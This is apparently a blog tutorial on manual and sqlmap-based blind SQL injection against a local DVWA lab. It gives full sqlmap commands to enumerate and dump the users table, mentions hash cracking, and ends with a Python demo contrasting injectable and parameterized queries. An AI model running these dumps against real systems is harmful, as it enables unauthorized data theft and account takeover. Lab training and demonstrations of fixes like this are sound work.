LEARN CYBER SECURITY

SQL INJECTION (MANUAL) in DVWA - Part 3


Part 2- DVWA SQL INJECTION Attack - KALI LINUX.


➢ LOGIN TO DVWA (USERNAME: 'admin', PASSWORD: 'password')




● Now set security level to low.
1, Click on DVWA Security, in the left hand menu.
2, Select "low"
3, Click Submit



● Now click on SQL Injection (Blind), enter '1', then click Submit. We will notice that it returns “User ID exists in Database”. Now let's grab the cookie required for injecting.

For this we can use different tools that capture the cookie (e.g. Burp Suite, Tamper Data).
● We will be using Burp Suite
● Fire up Burpsuite


BURPSUITE CONFIGURATION

● Click on Proxy > Options > Add and match the given settings
 


Now let's configure our browser.

1, Click on ≡ > Preferences
2, Click on Setting in Network Proxy


1, Now match the following settings.



Now we are good to go.
1, Go to Burpsuite and click on Intercept and make sure that intercept is on.
2, Now again go to browser and Enter '1' again.
3, Check Burpsuite. We can see different information on the screen.



1, Copy the Cookie and PHPSESSID and save it somewhere else.
2, Now fire up a terminal. We will use SQLMAP for injecting. Type
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=(SESSION ID)" --dbs
and press 'y' for every option.



1, Now we can see the names of the different databases.



2, Let's see what tables are inside the dvwa database. For this type
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=(Session id)" -D dvwa --tables



We can see various tables in this Database.
3, Now let's see what columns are inside the table users. For this type
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=(session id)" -D dvwa -T users --columns

4, We can see various columns inside the table



5, Now Let's dump entries inside the columns i.e. users and passwords. For this type
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=(SESSION ID)" -D dvwa -T users -C user,password --dump

6, Now we can see the usernames and password hashes. If the hashes are not cracked in your case, you can crack them using CrackStation, John the Ripper or hashcat.



Proof of Concept
Now let's log out and try to log in with username: pablo and password: letmein. You can log in easily.
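
Why the "User ID exists in Database" answer is enough for the steps above, and what closes it: the following is an added example, not code from this post or from DVWA. It uses Python with sqlite3 as a stand-in for DVWA's PHP and MySQL; the table contents and the function names (make_db, exists_vulnerable, exists_hardened, leaks_boolean) are assumptions made for the illustration.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sqlite3 instead of MySQL).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "placeholder-hash-1"), (2, "pablo", "placeholder-hash-2")])
    return db

def exists_vulnerable(db, user_id):
    # Weak pattern: the request value is pasted into the SQL text, so the
    # input can rewrite the WHERE clause.
    sql = "SELECT user FROM users WHERE user_id = '" + user_id + "'"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # errors are hidden; only "exists" / "missing" is shown

def exists_hardened(db, user_id):
    # Fix 1: allow-list validation, a user ID is a short decimal integer.
    if not (user_id.isascii() and user_id.isdigit() and len(user_id) <= 9):
        return False
    # Fix 2: bind parameter, the value is passed as data and never parsed as SQL.
    row = db.execute("SELECT user FROM users WHERE user_id = ?", (int(user_id),)).fetchone()
    return row is not None

# Constructed inputs: the same ID with an always-true and an always-false condition.
PROBES = ("1' AND '1'='1", "1' AND '1'='2")

def leaks_boolean(check, db):
    # True when the page answers the two probes differently, i.e. the response
    # reveals the truth value of SQL supplied in the request (a boolean oracle).
    answers = [check(db, probe) for probe in PROBES]
    return answers[0] != answers[1]

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks:", leaks_boolean(exists_vulnerable, db))
    print("parameterized query leaks:", leaks_boolean(exists_hardened, db))
```

With the concatenated query the two probes get different answers, and that one-bit difference is what a blind-injection tool measures; with validation plus a bind parameter both probes are simply rejected as invalid IDs.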



